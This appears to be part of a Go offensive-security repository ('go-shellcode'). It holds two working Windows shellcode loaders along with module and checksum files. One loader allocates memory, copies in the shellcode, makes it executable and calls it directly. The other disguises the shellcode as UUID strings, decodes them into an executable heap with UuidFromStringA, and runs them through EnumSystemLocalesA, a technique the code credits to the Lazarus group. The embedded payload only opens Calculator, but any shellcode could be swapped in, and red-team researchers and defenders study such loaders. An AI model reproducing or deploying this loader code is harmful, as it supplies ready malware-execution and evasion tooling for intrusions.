/* 4 | This program executes shellcode in the current process using the following steps 5 | 1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write 6 | 2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space 7 | 3. Change the memory page permissions to Execute/Read with VirtualProtect 8 | 4. Use syscall to execute the entrypoint of the shellcode 9 | 10 | This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly. 11 | */ 12 | 13 | package main 14 | 15 | import ( 16 | "encoding/hex" 17 | "flag" 18 | "fmt" 19 | "log" 20 | "syscall" 21 | "unsafe" 22 | 23 | // Sub Repositories 24 | "golang.org/x/sys/windows" 25 | ) 26 | 27 | const ( 28 | // MEM_COMMIT is a Windows constant used with Windows API calls 29 | MEM_COMMIT = 0x1000 30 | // MEM_RESERVE is a Windows constant used with Windows API calls 31 | MEM_RESERVE = 0x2000 32 | // PAGE_EXECUTE_READ is a Windows constant used with Windows API calls 33 | PAGE_EXECUTE_READ = 0x20 34 | // PAGE_READWRITE is a Windows constant used with Windows API calls 35 | PAGE_READWRITE = 0x04 36 | ) 37 | 38 | func main() { 39 | verbose := flag.Bool("verbose", false, "Enable verbose output") 40 | debug := flag.Bool("debug", false, "Enable debug output") 41 | flag.Parse() 42 | 43 | // Pop Calc Shellcode 44 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 45 | if errShellcode != nil { 46 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 47 | } 48 | 49 | if *debug { 50 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll") 51 | } 52 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 53 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 54 | 55 | if *debug { 56 | fmt.Println("[DEBUG]Loading VirtualAlloc, VirtualProtect and RtlCopyMemory procedures") 57 | } 58 | VirtualAlloc := kernel32.NewProc("VirtualAlloc") 59 | VirtualProtect := kernel32.NewProc("VirtualProtect") 60 | RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") 61 | 62 | if *debug { 63 | fmt.Println("[DEBUG]Calling VirtualAlloc for shellcode") 64 | } 65 | addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) 66 | 67 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 68 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 69 | } 70 | 71 | if addr == 0 { 72 | log.Fatal("[!]VirtualAlloc failed and returned 0") 73 | } 74 | 75 | if *verbose { 76 | fmt.Println(fmt.Sprintf("[-]Allocated %d bytes", len(shellcode))) 77 | } 78 | 79 | if *debug { 80 | fmt.Println("[DEBUG]Copying shellcode to memory with RtlCopyMemory") 81 | } 82 | _, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 83 | 84 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 85 | log.Fatal(fmt.Sprintf("[!]Error calling RtlCopyMemory:\r\n%s", errRtlCopyMemory.Error())) 86 | } 87 | if *verbose { 88 | fmt.Println("[-]Shellcode copied to memory") 89 | } 90 | 91 | if *debug { 92 | fmt.Println("[DEBUG]Calling VirtualProtect to change memory region to PAGE_EXECUTE_READ") 93 | } 94 | 95 | oldProtect := PAGE_READWRITE 96 | _, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 97 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 98 | log.Fatal(fmt.Sprintf("Error calling VirtualProtect:\r\n%s", errVirtualProtect.Error())) 99 | } 100 | if *verbose { 101 | fmt.Println("[-]Shellcode memory region changed to PAGE_EXECUTE_READ") 102 | } 103 | 104 | if *debug { 105 | fmt.Println("[DEBUG]Executing Shellcode") 106 | } 107 | _, _, errSyscall := syscall.Syscall(addr, 0, 0, 0, 0) 108 | 109 | if errSyscall != 0 { 110 | log.Fatal(fmt.Sprintf("[!]Error executing shellcode syscall:\r\n%s", errSyscall.Error())) 111 | } 112 | if *verbose { 113 | fmt.Println("[+]Shellcode Executed") 114 | } 115 | } 116 | 117 | // export GOOS=windows GOARCH=amd64;go build -o goSyscall.exe cmd/Syscall/main.go 118 | -------------------------------------------------------------------------------- /cmd/UuidFromString/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | // Concept pulled from https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/ 4 | 5 | /* 6 | This program executes shellcode in the current process using the following steps: 7 | 1. Create a Heap and allocate space 8 | 2. Convert shellcode into an array of UUIDs 9 | 3. Load the UUIDs into memory (on the allocated heap) by (ab)using the UuidFromStringA function 10 | 4. Execute the shellcode by (ab)using the EnumSystemLocalesA function 11 | */ 12 | 13 | // Reference: https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala 14 | 15 | package main 16 | 17 | import ( 18 | // Standard 19 | "bytes" 20 | "encoding/binary" 21 | "encoding/hex" 22 | "flag" 23 | "fmt" 24 | "log" 25 | "unsafe" 26 | 27 | // Sub Repositories 28 | "golang.org/x/sys/windows" 29 | 30 | // 3rd Party 31 | "github.com/google/uuid" 32 | ) 33 | 34 | func main() { 35 | verbose := flag.Bool("verbose", false, "Enable verbose output") 36 | debug := flag.Bool("debug", false, "Enable debug output") 37 | flag.Parse() 38 | 39 | // Pop Calc Shellcode 40 | shellcode, err := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 41 | if err != nil { 42 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", err)) 43 | } 44 | 45 | // Convert shellcode to UUIDs 46 | if *debug { 47 | fmt.Println("[DEBUG]Converting shellcode to slice of UUIDs") 48 | } 49 | 50 | uuids, err := shellcodeToUUID(shellcode) 51 | if err != nil { 52 | log.Fatal(err.Error()) 53 | } 54 | 55 | if *debug { 56 | fmt.Println("[DEBUG]Loading kernel32.dll & Rpcrt4.dll") 57 | } 58 | kernel32 := windows.NewLazySystemDLL("kernel32") 59 | rpcrt4 := windows.NewLazySystemDLL("Rpcrt4.dll") 60 | 61 | if *debug { 62 | fmt.Println("[DEBUG]Loading HeapCreate, HeapAlloc, EnumSystemLocalesA, and UuidToStringA procedures") 63 | } 64 | heapCreate := kernel32.NewProc("HeapCreate") 65 | heapAlloc := kernel32.NewProc("HeapAlloc") 66 | enumSystemLocalesA := kernel32.NewProc("EnumSystemLocalesA") 67 | uuidFromString := rpcrt4.NewProc("UuidFromStringA") 68 | 69 | /* https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapcreate 70 | HANDLE HeapCreate( 71 | DWORD flOptions, 72 | SIZE_T dwInitialSize, 73 | SIZE_T dwMaximumSize 74 | ); 75 | HEAP_CREATE_ENABLE_EXECUTE = 0x00040000 76 | */ 77 | 78 | // Create the heap 79 | // HEAP_CREATE_ENABLE_EXECUTE = 0x00040000 80 | heapAddr, _, err := heapCreate.Call(0x00040000, 0, 0) 81 | if heapAddr == 0 { 82 | log.Fatal(fmt.Sprintf("there was an error calling the HeapCreate function:\r\n%s", err)) 83 | 84 | } 85 | 86 | if *verbose { 87 | fmt.Println(fmt.Sprintf("Heap created at: 0x%x", heapAddr)) 88 | } 89 | 90 | /* https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc 91 | DECLSPEC_ALLOCATOR LPVOID HeapAlloc( 92 | HANDLE hHeap, 93 | DWORD dwFlags, 94 | SIZE_T dwBytes 95 | ); 96 | */ 97 | 98 | // Allocate the heap 99 | addr, _, err := heapAlloc.Call(heapAddr, 0, 0x00100000) 100 | if addr == 0 { 101 | log.Fatal(fmt.Sprintf("there was an error calling the HeapAlloc function:\r\n%s", err)) 102 | } 103 | 104 | if *verbose { 105 | fmt.Println(fmt.Sprintf("Heap allocated: 0x%x", addr)) 106 | } 107 | 108 | if *debug { 109 | fmt.Println("[DEBUG]Iterating over UUIDs and calling UuidFromStringA...") 110 | } 111 | 112 | /* 113 | RPC_STATUS UuidFromStringA( 114 | RPC_CSTR StringUuid, 115 | UUID *Uuid 116 | ); 117 | */ 118 | 119 | addrPtr := addr 120 | for _, uuid := range uuids { 121 | // Must be a RPC_CSTR which is null terminated 122 | u := append([]byte(uuid), 0) 123 | 124 | // Only need to pass a pointer to the first character in the null terminated string representation of the UUID 125 | rpcStatus, _, err := uuidFromString.Call(uintptr(unsafe.Pointer(&u[0])), addrPtr) 126 | 127 | // RPC_S_OK = 0 128 | if rpcStatus != 0 { 129 | log.Fatal(fmt.Sprintf("There was an error calling UuidFromStringA:\r\n%s", err)) 130 | } 131 | 132 | addrPtr += 16 133 | } 134 | if *verbose { 135 | fmt.Println("Completed loading UUIDs to memory with UuidFromStringA") 136 | } 137 | 138 | /* 139 | BOOL EnumSystemLocalesA( 140 | LOCALE_ENUMPROCA lpLocaleEnumProc, 141 | DWORD dwFlags 142 | ); 143 | */ 144 | 145 | // Execute Shellcode 146 | if *debug { 147 | fmt.Println("[DEBUG]Calling EnumSystemLocalesA to execute shellcode") 148 | } 149 | ret, _, err := enumSystemLocalesA.Call(addr, 0) 150 | if ret == 0 { 151 | log.Fatal(fmt.Sprintf("EnumSystemLocalesA GetLastError: %s", err)) 152 | } 153 | if *verbose { 154 | fmt.Println("Executed shellcode") 155 | } 156 | 157 | } 158 | 159 | // shellcodeToUUID takes in shellcode bytes, pads it to 16 bytes, breaks them into 16 byte chunks (size of a UUID), 160 | // converts the first 8 bytes into Little Endian format, creates a UUID from the bytes, and returns an array of UUIDs 161 | func shellcodeToUUID(shellcode []byte) ([]string, error) { 162 | 163 | // Pad shellcode to 16 bytes, the size of a UUID 164 | if 16-len(shellcode)%16 < 16 { 165 | pad := bytes.Repeat([]byte{byte(0x90)}, 16-len(shellcode)%16) 166 | shellcode = append(shellcode, pad...) 167 | } 168 | 169 | var uuids []string 170 | 171 | for i := 0; i < len(shellcode); i += 16 { 172 | var uuidBytes []byte 173 | 174 | // This seems unecessary or overcomplicated way to do this 175 | 176 | // Add first 4 bytes 177 | buf := make([]byte, 4) 178 | binary.LittleEndian.PutUint32(buf, binary.BigEndian.Uint32(shellcode[i:i+4])) 179 | uuidBytes = append(uuidBytes, buf...) 180 | 181 | // Add next 2 bytes 182 | buf = make([]byte, 2) 183 | binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+4:i+6])) 184 | uuidBytes = append(uuidBytes, buf...) 185 | 186 | // Add next 2 bytes 187 | buf = make([]byte, 2) 188 | binary.LittleEndian.PutUint16(buf, binary.BigEndian.Uint16(shellcode[i+6:i+8])) 189 | uuidBytes = append(uuidBytes, buf...) 190 | 191 | // Add remaining 192 | uuidBytes = append(uuidBytes, shellcode[i+8:i+16]...) 193 | 194 | u, err := uuid.FromBytes(uuidBytes) 195 | if err != nil { 196 | return nil, fmt.Errorf("there was an error converting bytes into a UUID:\n%s", err) 197 | } 198 | 199 | uuids = append(uuids, u.String()) 200 | } 201 | return uuids, nil 202 | } 203 | 204 | // export GOOS=windows GOARCH=amd64;go build -o UuidFromString.exe cmd/UuidFromString/main.go 205 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/Ne0nd0g/go-shellcode 2 | 3 | go 1.14 4 | 5 | require ( 6 | github.com/fatih/color v1.9.0 7 | github.com/google/uuid v1.2.0 8 | golang.org/x/crypto v0.0.0-20200427165652-729f1e841bcc 9 | golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527 10 | ) 11 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s= 2 | github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU= 3 | github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs= 4 | github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= 5 | github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA= 6 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= 7 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= 8 | github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM= 9 | github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= 10 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 11 | golang.org/x/crypto v0.0.0-20200427165652-729f1e841bcc h1:ZGI/fILM2+ueot/UixBSoj9188jCAxVHEZEGhqq67I4= 12 | golang.org/x/crypto v0.0.0-20200427165652-729f1e841bcc/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 13 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 14 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 15 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 16 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 17 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037 h1:YyJpGZS1sBuBCzLAR1VEpK193GlqGZbnPFnPV/5Rsb4= 18 | golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 19 | golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527 h1:uYVVQ9WP/Ds2ROhcaGPeIdVq0RIXVLwsHlnvJ+cT1So= 20 | golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 21 | golang.org/x/text v0.3.0 h1:g61tztE5qeGQ89tm6NTjjM9VPIm088od1l6aSorWRWg= 22 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 23 | --------------------------------------------------------------------------------